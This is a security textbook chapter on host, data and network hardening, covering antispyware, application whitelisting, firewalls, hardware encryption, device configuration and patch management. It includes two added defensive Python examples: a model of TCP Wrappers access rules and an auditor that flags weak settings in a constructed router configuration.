Most antivirus products will include antispyware capabilities as well. While antivirus programs were designed to watch for the writing of files to the file system, many current forms of malware avoid the file system to avoid this form of detection. Newer antivirus products are adapting and scanning memory as well as watching file system access in an attempt to detect advanced malware. Spyware is the term used to define malware that is designed to steal information from the system, such as keystrokes, passwords, PINs, and keys. Antispyware helps protect your systems from the ever-increasing flood of malware that seeks to watch your keystrokes, steal your passwords, and report sensitive information back to attackers. Many of these attack vectors work in system memory to avoid easy detection.
Windows Defender
As part of its ongoing efforts to help secure its PC operating systems, Microsoft released a free utility called Windows Defender in February 2006. The stated purpose of Windows Defender is to protect your computer from spyware and other unwanted software (http://windows.microsoft.com/en-us/windows/using-defender#1TC=windows-7). Windows Defender is standard with all versions of the Vista and Windows 7 operating systems and is available via free download in both 32- and 64-bit versions. It has the following capabilities:
Spyware detection and removal: Windows Defender is designed to find and remove spyware and other unwanted programs that display pop-ups, modify browser or Internet settings, or steal personal information from your PC.
Scheduled scanning: You can schedule when you want your system to be scanned or you can run scans on demand.
Automatic updates: Updates to the product can be automatically downloaded and installed without user interaction.
Real-time protection: Processes are monitored in real time to stop spyware and malware when they first launch, attempt to install themselves, or attempt to access your PC.
Software Explorer: One of the more interesting capabilities within Windows Defender is the ability to examine the various programs running on your computer. Windows Defender allows you to look at programs that run automatically on startup, are currently running on your PC, or are accessing network connections on your PC. Windows Defender provides you with details such as the publisher of the software, when it was installed on your PC, whether or not the software is “good” or considered to be known malware, the file size, publication date, and other information.
Configurable responses: Windows Defender lets you choose what actions you want to take in response to detected threats (see Figure 14.13); you can automatically disable the software, quarantine it, attempt to uninstall it, and perform other tasks.
• Figure 14.13 Windows Defender configuration options
Pop-up Blockers
One of the most annoying nuisances associated with web browsing is the pop-up ad. Pop-up ads are online advertisements designed to attract web traffic to specific websites, capture e-mail addresses, advertise a product, and perform other tasks. If you’ve spent more than an hour surfing the Web, you’ve undoubtedly seen them. They’re created when the website you are visiting opens a new web browser window for the sole purpose of displaying an advertisement. Pop-up ads typically appear in front of your current browser window to catch your attention (and disrupt your browsing). Pop-up ads can range from mildly annoying, generating one or two pop-ups, to system crippling if a malicious website attempts to open thousands of pop-up windows on your system. Similar to the pop-up ad is the pop-under ad that opens up behind your current browser window. You won’t see these ads until your current window is closed, and they are considered by some to be less annoying than pop-ups. Another form of pop-up is the hover ad that uses Dynamic HTML to appear as a floating window superimposed over your browser window. To some users, pop-up ads are as undesirable as spam, and many web browsers now allow users to restrict or prevent pop-ups with functionality either built into the web browser or available as an add-on. Internet Explorer contains a built-in Pop-up Blocker (shown in Figure 14.14 and available from the Tools menu in Internet Explorer 11).
• Figure 14.14 Pop-up Blocker in IE 11
Firefox also contains a built-in pop-up blocker (available by choosing Tools | Options and then selecting the Content tab). Popular add-ons such as the Google and Yahoo! toolbars also contain pop-up blockers. If these freely available options are not enough for your needs, many commercial security suites from McAfee, Symantec, and Check Point contain pop-up blocking capabilities as well. Users must be careful when selecting a pop-up blocker, as some unscrupulous developers have created adware products disguised as free pop-up blockers or other security tools.
Exam Tip: Pop-up blockers are used to prevent websites from opening additional web browser windows or tabs without specific user consent.
Pop-up ads can be generated in a number of ways, including JavaScript and Adobe Flash, and an effective pop-up blocker must be able to deal with the many methods used to create pop-ups. When a pop-up is created, users typically can click a close or cancel button inside the pop-up or close the new window using a method available through the OS, such as closing the window from the taskbar in Windows. With the advanced features available to them in a web development environment, some unscrupulous developers program the close or cancel button in their pop-ups to launch new pop-ups, redirect the user, run commands on the local system, or even load software. Pop-ups should not be confused with adware. Pop-ups are ads that appear as you visit web pages. Adware is advertising-supported software. Adware automatically downloads and displays ads on your computer after the adware has been installed, and these ads are typically shown while the software is being used. Adware is often touted as “free” software, as the user pays nothing for the software but must agree to allow ads to be downloaded and displayed before using the software. This approach is very popular on smartphones and mobile devices.
White Listing vs. Black Listing Applications
Applications can be controlled at the OS at the time of start via blacklisting or whitelisting. Blacklisting is essentially noting which applications should not be allowed to run on the machine. This is basically a permanent “ignore” or “call block” type capability. Whitelisting is the exact opposite: it consists of a list of allowed applications. Each of these approaches has advantages and disadvantages. Blacklisting is difficult to use against dynamic threats, as the identification of a specific application can easily be avoided through minor changes. Whitelisting is easier to employ from the aspect of the identification of applications that are allowed to run—hash values can be used to ensure the executables are not corrupted. The challenge in whitelisting is the number of potential applications that are run on a typical machine. For a single-purpose machine, such as a database server, whitelisting can be relatively easy to employ. For multipurpose machines, it can be more complicated. Microsoft has two mechanisms that are part of the OS to control which users can use which applications:
Software Restriction Policies: Employed via group policies and allow significant control over applications, scripts, and executable files. The primary mode is by machine and not by user account.
User account level control: Enforced via AppLocker, a service that allows granular control over which users can execute which programs. Through the use of rules, an enterprise can exert significant control over who can access and use installed software.
On a Linux platform, similar capabilities are offered from third-party vendor applications.
AppLocker
AppLocker is a component of Windows 7 and later that enables administrators to enforce which applications are allowed to run via a set of predefined rules. AppLocker is an adjunct to Software Restriction Policies (SRP). SRP required significant administration on a machine-by-machine basis and was difficult to administer across an enterprise. AppLocker was designed so the rules can be distributed and enforced by GPO. They both act to prevent the running of both unauthorized software and malware on a machine, but AppLocker is significantly easier to administer. Figure 14.15 shows the AppLocker interface in Windows 7. Some of the features that are enabled via AppLocker are restrictions by user and the ability to run in an audit mode, where results are logged but not enforced, allowing settings to be tested before use.
• Figure 14.15 AppLocker in Windows 7
Trusted OS
A Trusted Operating System is one that is designed to allow multilevel security in its operation. This is further defined by its ability to meet a series of criteria required by the U.S. government. Trusted OSs are expensive to create and maintain because any change must typically undergo a recertification process. The most common criteria used to define a Trusted OS is the Common Criteria for Information Technology Security Evaluation (abbreviated as Common Criteria, or CC), a harmonized security criteria recognized by many nations, including the United States, Canada, Great Britain, and most of the EU countries, as well as others. Versions of Windows, Linux, mainframe OSs, and specialty OSs have been qualified to various Common Criteria levels.
Exam Tip: The term Trusted Operating System is used to refer to a system that has met a set of criteria and demonstrated correctness to meet requirements of multilevel security. The Common Criteria is one example of a standard used by government bodies to determine compliance to a level of security need.
Host-based Firewalls
Personal firewalls are host-based protective mechanisms that monitor and control traffic passing into and out of a single system. Designed for the end user, software firewalls often have a configurable security policy that allows the user to determine which traffic is “good” and is allowed to pass and which traffic is “bad” and is blocked. Software firewalls are extremely commonplace—so much so that most modern OSs come with some type of personal firewall included. Linux-based OSs have had built-in software-based firewalls (see Figure 14.16) for a number of years, including TCP Wrappers, ipchains, and iptables.
• Figure 14.16 Linux firewall
TCP Wrappers is a simple program that limits inbound network connections based on port number, domain, or IP address and is managed with two text files called hosts.allow and hosts.deny. If the inbound connection is coming from a trusted IP address and destined for a port to which it is allowed to connect, then the connection is allowed. Ipchains is a more advanced, rule-based software firewall that allows for traffic filtering, Network Address Translation (NAT), and redirection. Three configurable “chains” are used for handling network traffic: input, output, and forward. The input chain contains rules for traffic that is coming into the local system. The output chain contains rules for traffic that is leaving the local system. The forward chain contains rules for traffic that was received by the local system but is not destined for the local system. Iptables is the latest evolution of ipchains. Iptables uses the same three chains for policy rules and traffic handling as ipchains, but with iptables each packet is processed only by the appropriate chain. Under ipchains, each packet passes through all three chains for processing. With iptables, incoming packets are processed only by the input chain and packets leaving the system are processed only by the output chain. This allows for more granular control of network traffic and enhances performance.
In addition to the “free” firewalls that come bundled with OSs, many commercial personal firewall packages are available. Programs such as ZoneAlarm from Check Point Software Technologies provide or bundle additional capabilities not found in some bundled software firewalls. Many commercial software firewalls limit inbound and outbound network traffic, block pop-ups, detect adware, block cookies, block malicious processes, and scan instant messenger traffic. While you can still purchase or even download a free software-based personal firewall, most commercial vendors are bundling the firewall functionality with additional capabilities such as antivirus and antispyware. Microsoft Windows has had a personal software firewall since Windows XP SP2. Windows Firewall (see Figure 14.17) is enabled by default and has warnings when disabled. Windows Firewall is fairly configurable; it can be set up to block all traffic, make exceptions for traffic you want to allow, and log rejected traffic for later analysis.
• Figure 14.17 Windows Firewall is enabled by default in XP SP2, Vista, and Windows 7.
With the introduction of the Vista operating system, Microsoft modified Windows Firewall to make it more capable and configurable. More options were added to allow for more granular control of network traffic as well as the ability to detect when certain components are not behaving as expected. For example, if your MS Outlook client suddenly attempts to connect to a remote web server, Windows Firewall can detect this as a deviation from normal behavior and block the unwanted traffic.
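The hosts.allow/hosts.deny decision that TCP Wrappers makes for an inbound connection, modelled as an added example that is not from the textbook or from the TCP Wrappers source. It follows the order documented in hosts_access(5): a (daemon, client) pair matching hosts.allow is granted, otherwise one matching hosts.deny is refused, otherwise it is granted. Both file contents are constructed samples; only the ALL and LOCAL wildcards, exact names, ".domain" suffixes, "n.n.n." prefixes, net/mask pairs and a single EXCEPT per list are modelled, and only for IPv4.

```python
"""Added example (not from the textbook): a simplified model of the
TCP Wrappers access decision driven by hosts.allow and hosts.deny.
Both file contents are constructed samples."""
import ipaddress

HOSTS_ALLOW = """\
# constructed sample /etc/hosts.allow
sshd : 192.168.1. EXCEPT 192.168.1.99
sshd, vsftpd : .corp.example
ALL : 127.0.0.1
"""

HOSTS_DENY = """\
# constructed sample /etc/hosts.deny: refuse everything not allowed above
ALL : ALL
"""

def _split_list(field):
    """'a, b EXCEPT c' -> (['a', 'b'], ['c'])."""
    included, _, excluded = field.partition(" EXCEPT ")
    tokens = lambda s: s.replace(",", " ").split()
    return tokens(included), tokens(excluded)

def parse_rules(text):
    """Return [(daemon_list, client_list), ...]; comments and blanks skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = [f.strip() for f in line.split(":")]
        if len(fields) >= 2:          # an optional third field (shell command) is ignored
            rules.append((_split_list(fields[0]), _split_list(fields[1])))
    return rules

def _client_token_matches(pattern, host, ip):
    """One client pattern against the connecting host name and IPv4 address."""
    if pattern == "ALL":
        return True
    if pattern == "LOCAL":            # host name without a dot
        return "." not in host
    if pattern.startswith("."):       # domain suffix, e.g. .corp.example
        return host.endswith(pattern)
    if pattern.endswith("."):         # address prefix, e.g. 192.168.1.
        return ip.startswith(pattern)
    if "/" in pattern:                # n.n.n.n/m.m.m.m or CIDR
        try:
            return ipaddress.ip_address(ip) in ipaddress.ip_network(pattern, strict=False)
        except ValueError:
            return False
    return pattern in (host, ip)      # exact host name or address

def _list_matches(lst, match):
    """A list matches when an included pattern matches and no EXCEPT pattern does."""
    included, excluded = lst
    return any(match(p) for p in included) and not any(match(p) for p in excluded)

def _rule_matches(rule, daemon, host, ip):
    daemons, clients = rule
    return (_list_matches(daemons, lambda p: p == "ALL" or p == daemon)
            and _list_matches(clients, lambda p: _client_token_matches(p, host, ip)))

def hosts_access(daemon, host, ip, allow=HOSTS_ALLOW, deny=HOSTS_DENY):
    """True when the connection would be accepted, False when refused."""
    if any(_rule_matches(r, daemon, host, ip) for r in parse_rules(allow)):
        return True
    if any(_rule_matches(r, daemon, host, ip) for r in parse_rules(deny)):
        return False
    return True   # matched neither file: TCP Wrappers grants access by default
```

Note the last line: without an `ALL : ALL` entry in hosts.deny, anything not explicitly refused is accepted, which is why the constructed hosts.deny above closes with that default-deny entry.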
Hardware Security
Hardware, in the form of servers, workstations, and even mobile devices, can represent a weakness or vulnerability in the security system associated with an enterprise. While hardware can be easily replaced if lost or stolen, the information that is contained by the devices complicates the security picture. Data or information can be safeguarded from loss by backups, but this does little in the way of protecting it from disclosure to an unauthorized party. There are software measures that can assist in the form of encryption, but these also have drawbacks in the form of scalability and key distribution. There are some hardware protection mechanisms that should be employed to safeguard information in servers, workstations, and mobile devices. Cable locks can be employed on mobile devices to prevent their theft. Locking cabinets and safes can be used to secure portable media, USB drives, and CDs/DVDs. Physical security is covered in more detail in Chapter 8.
Exam Tip: Physical security is an essential element of a security plan. Unauthorized access to hardware and networking components can make many security controls ineffective.
Host Software Baselining
To secure the software on a system effectively and consistently, you must take a structured and logical approach. This starts with an examination of the system’s intended functions and capabilities to determine what processes and applications will be housed on the system. As a best practice, anything that is not required for operations should be removed or disabled on the system; then, all the appropriate patches, hotfixes, and settings should be applied to protect and secure it. This process of establishing software’s base security state is called baselining, and the resulting product is a security baseline that allows the software to run safely and securely. Software and hardware can be tied intimately when it comes to security, so they must be considered together. Once the process has been completed for a particular hardware and software combination, any similar systems can be configured with the same baseline to achieve the same level and depth of security and protection. Uniform software baselines are critical in large-scale operations, because maintaining separate configurations and security levels for hundreds or thousands of systems is far too costly. After administrators have finished patching, securing, and preparing a system, they often create an initial baseline configuration. This represents a secure state for the system or network device and a reference point of the software and its configuration. This information establishes a reference that can be used to help keep the system secure by establishing a known safe configuration. If this initial baseline can be replicated, it can also be used as a template when deploying similar systems and network devices.
Host-based Security Controls
Security controls can be implemented on a host machine for the express purpose of providing data protection on the host. This section explores methods to implement the appropriate controls to ensure data security.
Hardware-based Encryption Devices
Hardware-based encryption devices are designed to assist in the encryption/decryption actions via hardware rather than software on a system. Integration of encryption functionality via hardware offers both performance and security advantages for these solutions.
TPM
The Trusted Platform Module (TPM) is a hardware solution on the motherboard, one that assists with key generation and storage as well as random number generation. When the encryption keys are stored in the TPM, they are not accessible via normal software channels and are physically separated from the hard drive or other encrypted data locations. This makes the TPM a more secure solution than storing the keys on the machine's normal storage.
HSM
A hardware security module (HSM) is a device used to manage or store encryption keys. It can also assist in cryptographic operations such as encryption, hashing, or the application of digital signatures. HSMs are typically peripheral devices, connected via USB or a network connection. HSMs have tamper protection mechanisms to prevent physical access to the secrets they protect. Because of their dedicated design, they can offer significant performance advantages over general-purpose computers when it comes to cryptographic operations. When an enterprise has significant levels of cryptographic operations, HSMs can provide throughput efficiencies.
Exam Tip: Storing private keys anywhere on a networked system is a recipe for loss. HSMs are designed to allow the use of the key without exposing it to the wide range of host-based threats.
USB Encryption
Universal Serial Bus (USB) offers an easy connection mechanism to connect devices to a computer. This acts as the mechanism of transport between the computer and an external device. When data traverses the USB connection, it typically ends up on a portable device and thus requires an appropriate level of security. Many mechanisms exist, from encryption on the USB device itself, to OS-enabled encryption, to independent encryption before moving the data. Each of these mechanisms has advantages and disadvantages, and it is ultimately up to the user to choose the best method based on the sensitivity of the data.
Hard Drive
As hard drives exist to store information, having the drive itself offer encryption services can provide flexibility in terms of performance and security. It is possible to buy hard drives today with integrated AES encryption, so that the drive content is secured and the keys can be stored separately in a TPM. This offers significant performance and security enhancements over other, software-based solutions.
Data Encryption
Data encryption continues to be the best solution for data security. Properly encrypted, the data is not readable by an unauthorized party. There are numerous ways to enact this level of protection on a host machine.
Full Disk
Full disk encryption refers to the act of encrypting an entire partition in one operation. Then as specific elements are needed, those particular sectors can be decrypted for use. This offers a simple convenience factor and ensures that all of the data is protected. It does come at a performance cost, as the act of decrypting and encrypting takes time. For some high-performance data stores, especially those with latency issues, this performance hit may be critical. Although better performance can be achieved with specialized hardware, as with all security controls there needs to be an evaluation of the risk involved versus the costs.
Database
Major database engines have built-in encryption capabilities. The advantage to these encryption schemes is that they can be tailored to the data structure, protecting the essential columns while not impacting columns that are not sensitive. Properly employing database encryption requires that the data schema and its security requirements be designed into the database implementation. The advantage is in better protection against any database compromise, and the performance hit is typically negligible with respect to other alternatives.
Individual Files
Individual files can be encrypted as well in a system. This can be done either at the OS level or via a third-party application. Managing individual file encryption can be tricky, as the problem moves to an encryption key security problem. When using built-in encryption methods with an OS, the key issue is resolved by the OS itself, with a single key being employed and stored with the user credentials. One of the advantages of individual file encryption comes when transferring data to another user. Transporting a single file via an unprotected channel such as e-mail can be done securely with single-file encryption.
Removable Media
Removable media, by its very nature, can be moved to another location, making the securing of the data stored on the device essential. Again, encryption becomes the tool of choice, and a wide range of encryption methods and applications support the protection of removable media. Microsoft BitLocker, built into current editions of its Enterprise, Ultimate, and Pro OSs, offers the ability to protect data stored on removable media.
Mobile Devices
Mobile device security, covered in detail in Chapter 12, is also essential when critical or sensitive data is transmitted to mobile devices. The protection of mobile devices goes beyond simple encryption of the data, as the device can act as an authorized endpoint for the system, opening up avenues of attack.
Data Security
Data or information is the most important element to protect in the enterprise. Equipment can be purchased, replaced, and shared without consequence; it is the information that is being processed that has the value. Data security refers to the actions taken in the enterprise to secure data, wherever it resides: in transit, at rest, or in use.
Data in Transit
Data has value in the enterprise, but for the enterprise to fully realize the value, data elements need to be shared and moved between systems. Whenever data is in transit, being moved from one system to another, it needs to be protected. The most common method of this protection is via encryption. What is important is to ensure that data is always protected in proportion to the degree of risk associated with a data security failure.
Data at Rest
Data at rest refers to data being stored. Data is stored in a variety of formats: in files, in databases, and as structured elements. Whether in ASCII, XML, JavaScript Object Notation (JSON), or a database, and regardless of on what media it is stored, data at rest still requires protection commensurate with its value. Again, as with data in transit, encryption is the best means of protection against unauthorized access or alteration.
Data in Use
Data is processed in applications, is used for various functions, and can be at risk when in system memory or even in the act of processing. Protecting data while in use is a much trickier proposition than protecting it in transit or in storage. While encryption can be used in these other situations, it is not practical to perform operations on encrypted data. This means that other means need to be taken to protect the data. Protected memory schemes and address space layout randomization are two tools that can be used to prevent data security failures during processing. Secure coding principles, including the definitive wiping of critical data elements once they are no longer needed, can assist in protecting data in use.
Exam Tip: Understanding the need to protect data in all three phases, in transit, at rest, and in use, is an important concept for the exam. The first step is to identify the phase the data is in, and the second is to identify the correct means of protection for that phase.
Handling Big Data
Big data is the industry buzzword for very large data sets being used in many enterprises. Data sets in the petabyte, exabyte, and even zettabyte range are now being explored in some applications. Data sets of these sizes require special hardware and software to handle them, but this does not alleviate the need for security. Planning for security on this scale requires enterprise-level thinking, but it is worth noting that eventually some subset of the information makes its way to a host machine for use. It is at this point that the data is vulnerable, because whatever protection scheme is in place on the large storage system, the data is outside that realm now. This means that local protection mechanisms, such as provided by Kerberos-based authentication, can be critical in managing this type of protection scheme.
Cloud Storage
Cloud computing is the use of online resources for storage, processing, or both. When storing data in the cloud, encryption can be used to protect the data, so that what is actually stored is encrypted data. This reduces the risk of data disclosure both in transit to the cloud and back as well as while in storage.
Storage Area Network
A storage area network (SAN) is a means of storing data across a secondary dedicated network. SANs operate to connect data storage devices as if they were local storage, yet they are separate and can be collections of disks, tapes, and other storage devices. Because the dedicated network is separate from the normal IP network, accessing the SAN requires going through one of the attached machines. This makes SANs a bit more secure than other forms of storage, although loss through a compromised client machine is still a risk.
Permissions/ACL
Access control lists (ACLs) form one of the foundational bases for security on a machine. ACLs can be used by the operating system to make determinations as to whether or not a user can access a resource. This level of permission restriction offers significant protection of resources and transfers the management of the access control problem to the management of ACLs, a smaller and more manageable problem.
Network Hardening
While considering the baseline security of systems, you must consider the role the network connection plays in the overall security profile. The tremendous growth of the Internet and the affordability of multiple PCs and Ethernet networking have resulted in almost every computer being attached to some kind of network, and once computers are attached to a network, they are open to access from any other user on that network. Proper controls over network access must be established on computers by controlling the services that are running and the ports that are opened for network access. In addition to servers and workstations, however, network devices must also be examined: routers, switches, and modems, as well as various other components. These network devices should be configured with very strict parameters to maintain network security. Like normal computer OSs that need to be patched and updated, the software that runs network infrastructure components needs to be updated regularly. Finally, an outer layer of security should be added by implementing appropriate firewall rules and router ACLs.
Cross Check
Network Devices, NAT, and Security
Chapter 9 discussed NAT (Network Address Translation). How do network devices that perform NAT services help secure private networks from Internet-based attacks?
Software Updates
Maintaining current vendor patch levels for your software is one of the most important things you can do to maintain security. This is also true for the infrastructure that runs the network. While some equipment is unmanaged and typically has no network presence and few security risks, any managed equipment that is responding on network ports will have some software or firmware controlling it. This software or firmware needs to be updated on a regular basis. The most common device that connects people to the Internet is the network router. Dozens of brands of routers are available on the market, but Cisco Systems products dominate. The popular Cisco Internetwork Operating System (IOS) runs on more than 70 of Cisco's devices and is installed countless times at countless locations. Its popularity has fueled research into vulnerabilities in the code, and over the past few years quite a few vulnerabilities have been reported. These vulnerabilities can take many forms because routers send and receive several different kinds of traffic, from the standard Telnet remote terminal, to routing information in the form of Routing Information Protocol (RIP) or Open Shortest Path First (OSPF) packets, to Simple Network Management Protocol (SNMP) packets. This highlights the need to update the Cisco IOS software on a regular basis.
While we focus on Cisco in our discussion, it's important to note that every network device, regardless of the manufacturer, needs to be maintained and patched to remain secure.
Cisco IOS also runs on many of its Ethernet switching products. Like routers, these have capabilities for receiving and processing protocols such as Telnet and SNMP. Smaller network components do not usually run large software suites and typically have smaller software loaded on internal nonvolatile RAM (NVRAM). While the update process for this kind of software is typically called a firmware update, this does not change the security implications of keeping it up to date. In the case of a corporate network with several devices, someone must take ownership of updating the devices, and updates must be performed regularly according to security and administration policies.
Device Configuration
As important as it is to keep software up to date, properly configuring network devices is equally, if not more, important. Many network devices, such as routers and switches, now have advanced remote management capabilities, with multiple open ports accepting network connections.
Proper configuration is necessary to keep these devices secure. Choosing a good password is very important in maintaining external and internal security, and closing or limiting access to any open ports is also a good step for securing the devices. On the more advanced devices, you must carefully consider what services the device is running, just as with a computer. Here are some general steps to take when securing networking devices:
Limit access to only those who need it: If your networking device allows management via a web interface, SSH, or any other method, limit who can connect to those services. Many networking devices allow you to specify which IP addresses are allowed to connect to those management services.
Choose good passwords: Always change default passwords and follow good password selection guidelines. If the device supports encryption, ensure passwords are stored in encrypted format on the device.
Password-protect console and remote access: If the device supports password protection, ensure that all local and remote access capabilities are password protected.
Turn off unnecessary services: If your networking equipment supports Telnet but your organization doesn't need it, turn that service off. It's always a good idea to disable or remove unused services. Your device may also support the use of ACLs to limit access to services such as Telnet or SSH on the device itself.
Change SNMP community strings: SNMP is widely used to manage networking equipment and typically allows a "public" string, which can typically only read information from a device, and a "private" string, which can often read and write to a device's configuration. Some manufacturers use default or well-known strings (such as "public" for the public string)—always change both the public and private strings if you are using SNMP.
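The checklist above can be turned into an automated review of a device's saved configuration. The following is an added example, not code from the book or from any vendor: it parses a constructed Cisco IOS-style running configuration and reports each item from the list that is not met (default SNMP communities, passwords not stored encrypted, unprotected console or vty lines, no ACL limiting management access, Telnet or the embedded web server left on). The sample configurations, finding codes, and every password or community value are made up for this example.

```python
"""Audit an IOS-style configuration against the device-hardening checklist."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Community strings shipped as vendor defaults; the text says to change both.
DEFAULT_COMMUNITIES = {"public", "private"}


@dataclass(frozen=True)
class Finding:
    code: str    # identifier (made up here) for the checklist item that failed
    detail: str  # the offending line or block header


def _split_config(config: str) -> Tuple[List[str], Dict[str, List[str]]]:
    """Separate global commands from 'line ...' blocks.

    IOS indents the sub-commands of a line block (console, vty) by one
    space, so an indented line belongs to the most recent 'line' header.
    """
    global_lines: List[str] = []
    blocks: Dict[str, List[str]] = {}
    current = None
    for raw in config.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue  # blank line or IOS comment
        if raw.startswith(" ") and current is not None:
            blocks[current].append(raw.strip())
        elif raw.startswith("line "):
            current = raw.strip()
            blocks[current] = []
        else:
            current = None
            global_lines.append(raw.strip())
    return global_lines, blocks


def audit_config(config: str) -> List[Finding]:
    """Return every checklist violation found in the configuration."""
    findings: List[Finding] = []
    global_lines, blocks = _split_config(config)

    # "Ensure passwords are stored in encrypted format on the device."
    if "service password-encryption" not in global_lines:
        findings.append(Finding("PASSWORDS_STORED_PLAINTEXT",
                                "service password-encryption is not enabled"))
    for line in global_lines:
        snmp = re.match(r"snmp-server community (\S+)", line)
        if snmp and snmp.group(1).lower() in DEFAULT_COMMUNITIES:
            findings.append(Finding("SNMP_DEFAULT_COMMUNITY", line))
        # 'enable password' is reversible; 'enable secret' stores a hash.
        if line.startswith("enable password"):
            findings.append(Finding("ENABLE_PASSWORD_NOT_SECRET", line))
        # "Turn off unnecessary services": the embedded web server is one.
        if line == "ip http server":
            findings.append(Finding("HTTP_MGMT_ENABLED", line))

    for header, body in blocks.items():
        # "Password-protect console and remote access."
        if not any(b == "login" or b.startswith("login ") for b in body):
            findings.append(Finding("LINE_NO_LOGIN", header))
        if header.startswith("line vty"):
            # "Limit access to only those who need it": an access-class ACL
            # restricts which source addresses may reach the vty lines.
            if not any(b.startswith("access-class ") for b in body):
                findings.append(Finding("VTY_NO_ACCESS_CLASS", header))
            transports = [b for b in body if b.startswith("transport input ")]
            if not transports:  # default varies by release; require ssh-only
                findings.append(Finding("VTY_NO_TRANSPORT_RESTRICTION", header))
            for t in transports:
                if re.search(r"\b(telnet|all)\b", t):
                    findings.append(Finding("TELNET_ENABLED", f"{header}: {t}"))
    return sorted(findings, key=lambda f: (f.code, f.detail))


# Constructed samples; hostnames, passwords and ACL numbers are invented.
WEAK_CONFIG = """\
! constructed sample, not from a real device
hostname edge-rtr
no service password-encryption
enable password cisco123
snmp-server community public RO
snmp-server community private RW
ip http server
line con 0
 no login
line vty 0 4
 password vty123
 login
 transport input telnet ssh
"""

HARDENED_CONFIG = """\
! constructed sample, not from a real device
hostname edge-rtr
service password-encryption
enable secret 5 $1$PLACEHOLDER
access-list 10 permit 10.10.0.0 0.0.0.255
snmp-server community X7rq-Constructed RO 10
no ip http server
line con 0
 password 7 PLACEHOLDER
 login
line vty 0 4
 access-class 10 in
 login local
 transport input ssh
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {len(audit_config(cfg))} finding(s)")
        for f in audit_config(cfg):
            print(f"  {f.code:30} {f.detail}")
```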
Exam Tip: The use of the word "public" as an SNMP community string is an extremely well-known vulnerability. Any system using an SNMP community string of "public" should be changed immediately.
Securing Management Interfaces
Some network security devices will have "management interfaces" that allow for remote management of the devices themselves. Often seen on firewalls, routers, and switches, a management interface allows connections to the device's management application, an SSH service, or even a web-based configuration GUI, which are not allowed on any other interface. Due to this high level of access, management interfaces and management applications must be secured against unauthorized access. They should not be connected to public network connections (the Internet) and DMZ connections. Where possible, access to management interfaces and applications should be restricted within an organization so employees without the proper access rights and privileges cannot even connect to those interfaces and applications.
VLAN Management
A virtual LAN, or VLAN, is a group of hosts that communicate as if they were on the same broadcast domain. A VLAN is a logical construct that can be used to help control broadcast domains, manage traffic flow, and restrict traffic between organizations, divisions, and so on. Layer 2 switches, by definition, will not bridge IP traffic across VLANs, which gives administrators the ability to segment traffic quite effectively. For example, if multiple departments are connected to the same physical switch, VLANs can be used to segment the traffic such that one department does not see the broadcast traffic from the other departments. By controlling the members of a VLAN, administrators can logically separate network traffic throughout the organization.
IPv4 vs. IPv6
IPv4 (Internet Protocol version 4) is the de facto communication standard in use on almost every network around the planet. Unfortunately, IPv4 contains some inherent shortcomings and vulnerabilities. In an effort to address these issues, the Internet Engineering Task Force (IETF) launched an effort to update or replace IPv4; the result is IPv6. Using a new packet format and much larger address space, IPv6 is designed to speed up packet processing by routers and supply 3.4 × 10^38 possible addresses (IPv4 uses only 32 bits for addressing; IPv6 uses 128 bits). Additionally, IPv6 has security "built in" with mandatory support for network layer security. Although widely adopted under IPv4, IPsec support is mandatory in IPv6. The issue now is one of conversion. IPv4 and IPv6 networks cannot talk directly to each other and must rely on some type of gateway. Many operating systems and devices currently support dual IP stacks and can run both IPv4 and IPv6. While adoption of IPv6 is proceeding, it is moving slowly and has yet to gain a significant foothold.
Exam Tip: A "hotfix" is designed to address/fix a specific problem—a buffer overflow in a specific application, for example. A patch is usually a collection of one or more fixes.
Some application "patches" contain new or enhanced functions and some change user-defined settings back to defaults during installation of the patch. If you are deploying an application patch across a large group of users, it is important to understand exactly what that application patch really does. Patches should first be tested in a nonproduction environment before deployment to determine exactly how they affect the system and the network it is connected to.
Application Hardening
Perhaps as important as OS and network hardening is application hardening—securing an application against local and Internet-based attacks. Hardening applications is fairly similar to hardening operating systems—you remove the functions or components you don't need, restrict access where you can, and make sure the application is kept up to date with patches. In most cases, the last step in that list is the most important for maintaining application security. After all, applications must be accessible to users or they serve no purpose. As most problems with applications tend to be buffer overflows in legitimate user input fields, patching the application is often the only way to secure it from attack.
Tech Tip
Port Scanners
To find out what services are open on a given host or network devices, many administrators will use a tool called a port scanner. A port scanner is a tool designed to probe remote systems for open TCP and UDP services. Nmap is a very popular (and free) port scanner (see http://nmap.org).
Application Configuration Baseline
As with operating systems, applications (particularly those providing public services such as web servers and mail servers) will have recommended security and functionality settings. In some cases, vendors will provide those recommended settings, and, in other cases, an outside organization such as NSA, ISSA, or SANS will provide recommended configurations for popular applications. Many large organizations will develop their own application configuration baseline—that list of settings, tweaks, and modifications that creates a functional and hopefully secure application for use within the organization. Developing an application baseline and using it any time that application is deployed within the organization helps to ensure a consistent (and hopefully secure) configuration across the organization.
Application Patches
As obvious as this seems, application patches are most likely going to come from the vendor that sells the application. After all, who else has access to the source code? In some cases, such as with Microsoft's IIS, this is the same company that sold the OS that the application runs on. In other cases, such as Apache, the vendor is OS independent and provides an application with versions for many different OSs. Application patches are likely to come in three varieties: hotfixes, patches, and upgrades. As described for OSs earlier in the chapter, hotfixes are usually small sections of code designed to fix a specific problem. For example, a hotfix may address a buffer overflow in the login routine for an application. Patches are usually collections of fixes, tend to be much larger, and are usually released on a periodic basis or whenever enough problems have been addressed to warrant a patch release. Upgrades are another popular method of patching applications, and they tend to be presented with a more positive spin than patches. Even the term upgrade has a positive connotation—you are moving up to a better, more functional, and more secure application. For this reason, many vendors release "upgrades" that consist mainly of fixes rather than new or enhanced functionality.
Exam Tip: Patch management is the process of planning, testing, and deploying patches in a controlled manner.
Patch Management
In the early days of network computing, things were easy—fewer applications existed, vendor patches came out annually or quarterly, and access was restricted to authorized individuals. Updates were few and easy to handle. Now application and OS updates are pushed constantly as vendors struggle to provide new capabilities, fix problems, and address vulnerabilities. Microsoft created "Patch Tuesday" in an effort to condense the update cycle and reduce the effort required to maintain its products, and has now gone to continuous patching of its newest OS. As the number of patches continues to rise, many organizations struggle to keep up with patches—which patches should be applied immediately, which are compatible with the current configuration, which will not affect current business operations, and so on. To help cope with this flood of patches, many organizations have adopted patch management, the process of planning, testing, and deploying patches in a controlled manner.
